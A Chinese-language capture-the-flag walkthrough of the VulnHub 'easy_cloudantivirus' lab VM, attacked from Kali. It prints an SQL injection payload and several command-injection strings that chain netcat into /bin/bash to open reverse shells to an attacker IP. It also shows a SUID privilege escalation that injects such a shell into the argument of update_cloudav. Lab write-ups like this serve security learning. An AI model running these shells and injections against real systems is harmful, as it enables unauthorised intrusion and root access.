0x00前言

必须安装在virtualbox

攻击机：kali

靶机  easy_cloudantivirus 

链接：

https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

0x01信息搜集

经过测试发现靶场IP为192.168.56.106

进一部对IP搜集信息

 发现8080端口youhttp服务。我们去看看有什么东西。

发现有一个页面需要输入邀请码，在这里我们可以尝试一下sql输入。

0x02sql注入 

抓到数据包放到bp的intruder模块中。

方法 尝试一些特殊字符，来看看有没有注入。或者直接包数字也OK

! @ # $ % ^ & * ( ) - _ = + { } [ ] | \ ; : ' " , < > . ? /

 根据返回的长度查看是否有异常。在尝试爆破后网站可能有问题重启一下就OK。

发现sql语句尝试拼接

payload:a" or 1=1--+ 

成功

0x03NC串联

页面上的结果类似 ls 所以可以尝试可能存在命令注入。

尝试一番后。

确认。有命令注入。后面就可以反弹shell。

方法 1. 代码  2.nc

这里为了符合主题，展示新的技术我就用nc了

先尝试一个是否能链接成功。

kali

靶机 payload  file | nc 192.168.56.105 4444  (kali IP )

4444端口会成功 1111我尝试无果很奇怪。

使用提权参数。 

file | nc 192.168.56.105 4444 -e /bin/bash 

使用这个一直不成功，所以引出来新的操作。NC串联。

kali需要监听两个端口。

file | nc 192.168.56.105 4444 | /bin/bash  | nc 192.168.56.105 5555

链接成功

 发现一个sql 使用file查询

0x04查看数据库/发送数据库

 发现一个数据库文件

database.sql

file 可以查看文件

file xxx 发现是sqlite3现在靶机上尝试。没有效果只能把文件发给kali来查看

发送数据库

kali接受成功

查看数据库

发现一些数据库源代码，推测有可能是输入一些密码的sql数据。想到靶机还有一个22端口开放

所以我们可以搜集一些用户名，来进行爆破。

0x05爆破SSH

查看用户并且搜集可以登陆的用户

cat /etc/passwd | grep "bin/bash"

root:x:0:0:root:/root:/bin/bash

cloudav:x:1000:1000:cloudav:/home/cloudav:/bin/bash

scanner:x:1001:1001:scanner,,,:/home/scanner:/bin/bash

弄成字典爆破，爆破无果，继续查看其他文件。

0x06suid提权

SUID（Set User ID）是 Linux 文件权限的一种特殊属性，用于在执行文件时临时授予文件拥有者的权限，而不是执行者本人的权限。SUID 提权是利用了设置了 SUID 位的二进制文件来获取更高权限，通常是提权到 root 权限。

也可以用下面的语句 查看有哪些权限位带有S的文件。

 find / -perm -4000 2>/dev/null 

在查看上层目录文件时发现user权限位有s权限,可能会存在suid提权的方式.

.c是源文件 直接查看.c 

简单查看发现使用时需要参数,尝试命令注入.

kali先监听，然后运行下面的语句

./update_cloudav "a | nc 192.168.56.105 2222 | /bin/bash | nc 192.168.56.105 3333"

用""是吧他们当作一个整体.

 反弹成功